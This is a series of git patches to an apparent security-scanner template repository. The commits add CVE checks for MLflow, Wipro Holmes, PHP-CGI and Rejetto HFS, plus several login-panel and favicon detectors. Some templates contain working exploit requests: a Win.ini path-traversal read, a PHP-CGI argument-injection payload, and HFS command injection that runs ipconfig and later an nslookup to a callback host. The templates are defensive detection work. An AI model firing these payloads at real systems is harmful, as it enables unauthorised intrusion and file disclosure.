http/cves/2023/CVE-2023-43472.yaml | 41 ++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2023/CVE-2023-43472.yaml diff --git a/http/cves/2023/CVE-2023-43472.yaml b/http/cves/2023/CVE-2023-43472.yaml new file mode 100644 index 0000000000..30fecfd16e --- /dev/null +++ b/http/cves/2023/CVE-2023-43472.yaml @@ -0,0 +1,41 @@ +id: CVE-2023-43472 + +info: + name: MLFlow < 2.8.1 - Sensitive Information Disclosure + author: ritikchaddha + severity: high + description: | + An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST API. + impact: | + An attacker can access sensitive information stored in MLFlow. + remediation: | + Upgrade MLFlow to a version that has patched CVE-2023-43472. + reference: + - https://www.contrastsecurity.com/security-influencers/discovering-mlflow-framework-zero-day-vulnerability-machine-language-model-security-contrast-security + - https://nvd.nist.gov/vuln/detail/CVE-2023-43472 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-43472 + epss-score: 0.00116 + epss-percentile: 0.44809 + cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* + metadata: + vendor: lfprojects + product: mlflow + shodan-query: http.title:"mlflow" + fofa-query: app="MLflow" + tags: cve,cve2023,mflow,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/api/2.0/preview/mlflow/experiments/list" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "experiment_id\":", "artifact_location\":", "lifecycle_stage\":")' + - 'contains(header, "application/json")' + - 'status_code == 200' + condition: and From 109b8842d210902c39bbce8719c8607bb4f24c07 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 7 Jun 2024 17:11:41 +0300 Subject: [PATCH 0041/1841] add CVE-2021-38146 --- http/cves/2021/CVE-2021-38146.yaml | 52 ++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/cves/2021/CVE-2021-38146.yaml diff --git a/http/cves/2021/CVE-2021-38146.yaml b/http/cves/2021/CVE-2021-38146.yaml new file mode 100644 index 0000000000..412241e758 --- /dev/null +++ b/http/cves/2021/CVE-2021-38146.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-38146 + +info: + name: Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download + author: securityforeveryone + severity: high + description: | + The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data. + remediation: Fixed In v21.4.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-38146 + - https://packetstormsecurity.com/files/164970/Wipro-Holmes-Orchestrator-20.4.1-Arbitrary-File-Download.html + - https://flippingbitz.com/post/wipro-ho-2041-cve/ + - https://www.wipro.com/holmes/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-38146 + cwe-id: CWE-22 + epss-score: 0.01735 + epss-percentile: 0.87875 + cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:* + metadata: + vendor: wipro + product: holmes + tags: cve,cve2021,packetstorm,Wipro,Wipro Holmes Orchestrator,lfi + +http: + - method: POST + path: + - "{{BaseURL}}/home/download" + + headers: + Content-Type: application/json + + body: | + { + "SearchString": "C:/Windows/Win.ini", + "Msg": "" + } + + matchers-condition: and + matchers: + - type: word + words: + - "[fonts]" + - "[extensions]" + - "[files]" + condition: and + - type: status + status: + - 200 From 81f39f4ea74ff8f25e22981b4ec453f20c1ab973 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 7 Jun 2024 17:17:05 +0300 Subject: [PATCH 0042/1841] add CVE-2021-38147 --- http/cves/2021/CVE-2021-38147.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2021/CVE-2021-38147.yaml diff --git a/http/cves/2021/CVE-2021-38147.yaml b/http/cves/2021/CVE-2021-38147.yaml new file mode 100644 index 0000000000..80e130a5a5 --- /dev/null +++ b/http/cves/2021/CVE-2021-38147.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-38147 + +info: + name: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Excel Report Download + author: securityforeveryone + severity: high + description: | + Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel. + remediation: Fixed In v21.4.0 + reference: + - https://www.wipro.com/holmes/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-38147 + - https://packetstormsecurity.com/files/165039/Wipro-Holmes-Orchestrator-20.4.1-Report-Disclosure.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-38147 + cwe-id: CWE-306 + epss-score: 0.00497 + epss-percentile: 0.76242 + cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:* + metadata: + vendor: wipro + product: holmes + tags: packetstorm,download,exposure,cve,cve2021 + +http: + - method: GET + path: + - "{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel" + - "{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel" + - "{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel" + - "{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel" + + matchers: + - type: dsl + dsl: + - "contains(body, ' Date: Fri, 7 Jun 2024 15:13:48 +0000 Subject: [PATCH 0043/1841] Remove Dell matcher from sonicwall WAF detect --- http/technologies/waf-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/technologies/waf-detect.yaml b/http/technologies/waf-detect.yaml index f7f72d309a..a708bd08fa 100644 --- a/http/technologies/waf-detect.yaml +++ b/http/technologies/waf-detect.yaml @@ -580,7 +580,6 @@ http: regex: - '(?i)This.request.is.blocked.by.the.SonicWALL' - '(?i)Dell.SonicWALL' - - '(?i)\bDell\b' - '(?i)Web.Site.Blocked.+\bnsa.banner' - '(?i)SonicWALL' - '(?i).>policy.this.site.is.blocked<.' From 538fb6bf31ae1f9edba86ec6d24f59a26af5acd0 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 7 Jun 2024 18:28:59 +0300 Subject: [PATCH 0044/1841] add cve-2024-4577 --- http/cves/2024/CVE-2024-4577.yaml | 41 +++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4577.yaml diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml new file mode 100644 index 0000000000..2490bcdd95 --- /dev/null +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -0,0 +1,41 @@ +id: CVE-2024-4577 + +info: + name: PHP CGI Argument Injection Vulnerability + author: securityforeveryone + severity: high + description: | + CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters. + reference: + - https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?123 + - https://github.com/TAM-K592/CVE-2024-4577/tree/main + tags: rce,php,cgi,cve2024,cve + +http: + - raw: + - | + POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + + + - | + POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + + + matchers-condition: and + matchers: + - type: word + words: + - "index of" + - "directory" + - "vulnerable" + condition: or + + - type: status + status: + - 200 From 5635a451a70014e228d2e461379bfc04dd9e0fa2 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 7 Jun 2024 18:36:04 +0300 Subject: [PATCH 0045/1841] yaml fix --- http/cves/2024/CVE-2024-4577.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml index 2490bcdd95..89b8c7a511 100644 --- a/http/cves/2024/CVE-2024-4577.yaml +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -31,9 +31,9 @@ http: matchers: - type: word words: - - "index of" - - "directory" - - "vulnerable" + - "index of" + - "directory" + - "vulnerable" condition: or - type: status From e322f3142143be9fb01bf343bc1c7b30152e73ed Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:04:41 -0300 Subject: [PATCH 0046/1841] Create CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 http/cves/2024/CVE-2024-23692 diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 new file mode 100644 index 0000000000..5b4a4f401b --- /dev/null +++ b/http/cves/2024/CVE-2024-23692 @@ -0,0 +1,25 @@ +id: CVE-2024-23692 + +info: + name: HFS Command Injection RCE + author: johnk3r + severity: critical + tags: rce,hfs,cve + +requests: + - method: GET + path: + - "{{BaseURL}}/?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + + matchers: + - type: regex + part: body + regex: + - "Windows IP Configuration" + - "Host Name" + + extractors: + - type: regex + part: body + regex: + - "Host Name .+ : ([^\r\n]+)" From f3bcd3e920554a5915c0f78581b6731a757102d8 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:08:35 -0300 Subject: [PATCH 0047/1841] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 5b4a4f401b..7c8569bf95 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -1,10 +1,19 @@ id: CVE-2024-23692 info: - name: HFS Command Injection RCE + name: Check Point Quantum Gateway - Information Disclosure author: johnk3r - severity: critical - tags: rce,hfs,cve + severity: high + description: | + CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. + reference: + - https://github.com/rapid7/metasploit-framework/pull/19240 + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + metadata: + verified: true + max-request: 1 + shodan-query: product:"HttpFileServer httpd" + tags: cve,cve2024,hfs,rce requests: - method: GET From cc743cfc3ad0a4d80f6451b6f9e326d8d6def24a Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:10:18 -0300 Subject: [PATCH 0048/1841] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 7c8569bf95..f3a81865e7 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -1,11 +1,11 @@ id: CVE-2024-23692 info: - name: Check Point Quantum Gateway - Information Disclosure + name: Rejetto HTTP File Server - Template injection author: johnk3r severity: high description: | - CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. + This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ From 84f71fee89b8b8227fb8294bd7f26469cc918c5d Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:12:47 -0300 Subject: [PATCH 0049/1841] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index f3a81865e7..76493f5f7d 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -3,7 +3,7 @@ id: CVE-2024-23692 info: name: Rejetto HTTP File Server - Template injection author: johnk3r - severity: high + severity: critical description: | This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: From d201d27254d3d0a55211894daf27d058537e8168 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:13:50 -0300 Subject: [PATCH 0050/1841] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 76493f5f7d..c8020027d8 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -8,7 +8,8 @@ info: This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce + - https://nvd.nist.gov/vuln/detail/CVE-2024-23692 metadata: verified: true max-request: 1 From ff26a49d5d399b3eac593d277489752276673c07 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:51:25 -0300 Subject: [PATCH 0051/1841] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 29 +++++++++++++---------------- 1 file changed, 13 insertions(+), 16 deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index c8020027d8..e60a524677 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -1,15 +1,14 @@ id: CVE-2024-23692 info: - name: Rejetto HTTP File Server - Template injection + name: Rejetto HTTP File Server - Template injection author: johnk3r - severity: critical + severity: high description: | - This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. + This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce - - https://nvd.nist.gov/vuln/detail/CVE-2024-23692 + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ metadata: verified: true max-request: 1 @@ -19,17 +18,15 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + - "{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + matchers-condition: and matchers: - - type: regex - part: body - regex: - - "Windows IP Configuration" - - "Host Name" + - type: word + part: interactsh_protocol + words: + - "dns" - extractors: - - type: regex - part: body - regex: - - "Host Name .+ : ([^\r\n]+)" + - type: status + status: + - 200 From 606e14add5e300faec37683abadc06f23cea205f Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 8 Jun 2024 17:43:35 +0200 Subject: [PATCH 0052/1841] Add files via upload --- .../oracle-application-server-panel.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/exposed-panels/oracle-application-server-panel.yaml diff --git a/http/exposed-panels/oracle-application-server-panel.yaml b/http/exposed-panels/oracle-application-server-panel.yaml new file mode 100644 index 0000000000..1dc2c0d97a --- /dev/null +++ b/http/exposed-panels/oracle-application-server-panel.yaml @@ -0,0 +1,29 @@ +id: oracle-application-server-panel + +info: + name: Oracle Application Server Login Panel - Detect + author: righettod + severity: info + description: Oracle Application Server login panel was detected. + metadata: + shodan-query: http.title:"Oracle Containers for J2EE" + max-request: 1 + tags: panel,oracle,containers,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/em/console/ias/oc4j/home" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "login to oracle application server control", "oracle enterprise manager")' + condition: and + + extractors: + - type: regex + group: 1 + regex: + - '(?i)Copyright\s+©\s+([0-9,\s]+),\s+Oracle' From 1bd911cc2e0058d42b834b4f51b4337c37101904 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 8 Jun 2024 17:55:20 +0200 Subject: [PATCH 0053/1841] Add the reference attribute --- http/exposed-panels/oracle-application-server-panel.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/exposed-panels/oracle-application-server-panel.yaml b/http/exposed-panels/oracle-application-server-panel.yaml index 1dc2c0d97a..ad1b8e4634 100644 --- a/http/exposed-panels/oracle-application-server-panel.yaml +++ b/http/exposed-panels/oracle-application-server-panel.yaml @@ -5,6 +5,8 @@ info: author: righettod severity: info description: Oracle Application Server login panel was detected. + reference: + - https://www.oracle.com/middleware/technologies/internet-application-server.html metadata: shodan-query: http.title:"Oracle Containers for J2EE" max-request: 1 From bb97593b5a9c0b1b7f094143f94321d6286122f8 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sat, 8 Jun 2024 19:02:55 +0100 Subject: [PATCH 0054/1841] lorex panel --- http/exposed-panels/lorex-panel.yaml | 30 ++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/exposed-panels/lorex-panel.yaml diff --git a/http/exposed-panels/lorex-panel.yaml b/http/exposed-panels/lorex-panel.yaml new file mode 100644 index 0000000000..6b65408503 --- /dev/null +++ b/http/exposed-panels/lorex-panel.yaml @@ -0,0 +1,30 @@ +id: lorex-panel-detect + +info: + name: lorex Panel + author: rxerium + severity: info + description: A lorex panel was detected. + reference: + - https://www.lorex.com/ + classification: + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: panel + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'WEB SERVICE' + part: body + + - type: status + status: + - 200 From 850c6a12fe5ad6bba9ae29469b45ba76da45b499 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sat, 8 Jun 2024 19:05:38 +0100 Subject: [PATCH 0055/1841] lorex favicon --- http/technologies/favicon-detect.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 1084b423c3..4a9488a994 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3756,6 +3756,11 @@ http: dsl: - "status_code==200 && (\"307296554\" == mmh3(base64_py(body)))" + - type: dsl + name: "lorex" + dsl: + - "status_code==200 && (\"1653394551\" == mmh3(base64_py(body)))" + extractors: - type: dsl dsl: From 9fac5e2524b70384c8c25b6208f8e477ebbef6a1 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sat, 8 Jun 2024 15:08:41 -0300 Subject: [PATCH 0056/1841] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index e60a524677..99cffeff67 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -3,7 +3,7 @@ id: CVE-2024-23692 info: name: Rejetto HTTP File Server - Template injection author: johnk3r - severity: high + severity: critical description: | This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: From 3d612f335209055ffc443848f3e805e176c6e92f Mon Sep 17 00:00:00 2001 From: Rishi Date: Sat, 8 Jun 2024 19:09:13 +0100 Subject: [PATCH 0057/1841] ic-realtime-favicon --- http/technologies/favicon-detect.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 1084b423c3..12516b9087 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3756,6 +3756,11 @@ http: dsl: - "status_code==200 && (\"307296554\" == mmh3(base64_py(body)))" + - type: dsl + name: "ic-realtime" + dsl: + - "status_code==200 && (\"2019488876\" == mmh3(base64_py(body)))" + extractors: - type: dsl dsl: From ca14fd217049e7d60855620d2d460ddb37310398 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sat, 8 Jun 2024 19:13:46 +0100 Subject: [PATCH 0058/1841] nperf detect --- http/exposed-panels/nperf-detect.yaml | 30 +++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/exposed-panels/nperf-detect.yaml diff --git a/http/exposed-panels/nperf-detect.yaml b/http/exposed-panels/nperf-detect.yaml new file mode 100644 index 0000000000..d5a0aacb62 --- /dev/null +++ b/http/exposed-panels/nperf-detect.yaml @@ -0,0 +1,30 @@ +id: nperf-web-console + +info: + name: nperf Panel - Detect + author: rxerium + severity: info + description: nperf Web Console login panel was detected. + reference: + - https://www.nperf.com + metadata: + verified: true + max-request: 1 + shodan-query: product:"nPerf" + tags: panel + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "nPerfServer" + + - type: status + status: + - 200 \ No newline at end of file From a711b2e714a340cc4a3ba1bcb87ddbb924212769 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sat, 8 Jun 2024 19:14:09 +0100 Subject: [PATCH 0059/1841] updates --- http/exposed-panels/nperf-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/nperf-detect.yaml b/http/exposed-panels/nperf-detect.yaml index d5a0aacb62..872bacea08 100644 --- a/http/exposed-panels/nperf-detect.yaml +++ b/http/exposed-panels/nperf-detect.yaml @@ -4,7 +4,7 @@ info: name: nperf Panel - Detect author: rxerium severity: info - description: nperf Web Console login panel was detected. + description: A nperf panel was detected. reference: - https://www.nperf.com metadata: From 0255488e90e667326d22c4b1fa6f71355c21362a Mon Sep 17 00:00:00 2001 From: Rishi Date: Sat, 8 Jun 2024 19:19:44 +0100 Subject: [PATCH 0060/1841] wildix login detect --- http/exposed-panels/wildix-detect.yaml | 27 ++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/wildix-detect.yaml diff --git a/http/exposed-panels/wildix-detect.yaml b/http/exposed-panels/wildix-detect.yaml new file mode 100644 index 0000000000..522312bb9d --- /dev/null +++ b/http/exposed-panels/wildix-detect.yaml @@ -0,0 +1,27 @@ +id: wildix-login-detect + +info: + name: wildix Login Panel - Detect + author: rxerium + severity: info + description: wildix login panel was detected. + reference: + - https://www.wildix.com/product/collaboration-ucc-platform/# + classification: + cwe-id: CWE-200 + tags: panel,login + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Wildix Collaboration" + + - type: status + status: + - 200 \ No newline at end of file From 1f1295a37d39e038cd816484dcaaa635c889688e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 9 Jun 2024 05:20:49 +0530 Subject: [PATCH 0061/1841] minor update --- http/cves/2024/CVE-2024-23692 | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 99cffeff67..aa8c5c5096 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -15,7 +15,7 @@ info: shodan-query: product:"HttpFileServer httpd" tags: cve,cve2024,hfs,rce -requests: +http: - method: GET path: - "{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" @@ -27,6 +27,7 @@ requests: words: - "dns" - - type: status - status: - - 200 + - type: word + part: body + words: + - "rejetto" From dfc9bc13403124f1c2a45892d7d30e166f24d596 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 9 Jun 2024 05:32:21 +0530 Subject: [PATCH 0062/1841] minor update --- http/exposed-panels/lorex-panel.yaml | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/http/exposed-panels/lorex-panel.yaml b/http/exposed-panels/lorex-panel.yaml index 6b65408503..ad6fb2357e 100644 --- a/http/exposed-panels/lorex-panel.yaml +++ b/http/exposed-panels/lorex-panel.yaml @@ -1,29 +1,35 @@ -id: lorex-panel-detect +id: lorex-panel info: - name: lorex Panel + name: Lorex Panel - Detect author: rxerium severity: info - description: A lorex panel was detected. + description: | + A lorex panel was detected. reference: - https://www.lorex.com/ classification: cwe-id: CWE-200 metadata: + verified: true max-request: 1 - tags: panel + shodan-query: html:"WEB SERVICE" + tags: panel,login,detect http: - method: GET path: - "{{BaseURL}}" + host-redirects: true + max-redirects: 2 + matchers-condition: and matchers: - type: word + part: body words: - 'WEB SERVICE' - part: body - type: status status: From cee045464d612c8583d90d88846db6bdbebbd450 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 9 Jun 2024 05:44:54 +0530 Subject: [PATCH 0063/1841] minor update --- http/cves/2021/CVE-2021-38146.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-38146.yaml b/http/cves/2021/CVE-2021-38146.yaml index 412241e758..3a45ad8ac8 100644 --- a/http/cves/2021/CVE-2021-38146.yaml +++ b/http/cves/2021/CVE-2021-38146.yaml @@ -21,9 +21,11 @@ info: epss-percentile: 0.87875 cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: wipro product: holmes - tags: cve,cve2021,packetstorm,Wipro,Wipro Holmes Orchestrator,lfi + fofa-query: title="Wipro Holmes Orchestrator" + tags: cve,cve2021,packetstorm,wipro,lfi http: - method: POST @@ -47,6 +49,7 @@ http: - "[extensions]" - "[files]" condition: and + - type: status status: - 200 From fb353a8359b3f01fc69be44e19d8f95838cdbbee Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 9 Jun 2024 05:47:13 +0530 Subject: [PATCH 0064/1841] minor update --- http/exposed-panels/oracle-application-server-panel.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/oracle-application-server-panel.yaml b/http/exposed-panels/oracle-application-server-panel.yaml index ad1b8e4634..c7ee1bc56c 100644 --- a/http/exposed-panels/oracle-application-server-panel.yaml +++ b/http/exposed-panels/oracle-application-server-panel.yaml @@ -4,12 +4,14 @@ info: name: Oracle Application Server Login Panel - Detect author: righettod severity: info - description: Oracle Application Server login panel was detected. + description: | + Oracle Application Server login panel was detected. reference: - https://www.oracle.com/middleware/technologies/internet-application-server.html metadata: - shodan-query: http.title:"Oracle Containers for J2EE" + verified: true max-request: 1 + shodan-query: http.title:"Oracle Containers for J2EE" tags: panel,oracle,containers,login,detect http: From 59a388b974111ceb9898867a3732c5a654b13423 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jun 2024 15:03:43 +0000 Subject: [PATCH 0066/1841] Auto Generated Templates Checksum [Sun Jun 9 15:03:43 UTC 2024] :robot: --- templates-checksum.txt | 4956 ++++++++++++++++++++-------------------- 1 file changed, 2478 insertions(+), 2478 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d4311160f2..46e77c46b8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,29 +8,29 @@ TEMPLATES-STATS.json:4ba5810b3ed18d96142d1e6001395674ce2ec334 TEMPLATES-STATS.md:c8d67b997860d489ea1c6fa3ced489f775541b8c TOP-10.md:83cb75ab6007e6212c71f3156a91e4c7756a08fc cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f -cloud/aws/acm/acm-cert-renewal-30days.yaml:c35bb6f6352b7f292b342c421ca5aa03f7fa21d4 -cloud/aws/acm/acm-cert-renewal-45days.yaml:b507b0434b601a48b7b316628fbed69170bf8a4f -cloud/aws/acm/acm-cert-validation.yaml:5d89d6b03e37950111e550a94c07381422fe5671 -cloud/aws/acm/acm-wildcard-cert.yaml:dda18aab45e86835d302c3b4dbb6fc986b90db0a -cloud/aws/aws-code-env.yaml:d5b86acbee81b62cbebca8f0e9ea783326da5f1e -cloud/aws/cloudtrail/cloudtrail-data-events.yaml:f02575ad6a0f2cb41d4b8a97a2f352a841788060 -cloud/aws/cloudtrail/cloudtrail-disabled.yaml:50b5bb4616bd41ea3c588bd148777d4e7f996c07 -cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:d7943f0043bcfe7c9ef9f58a649ed21ada8a104a 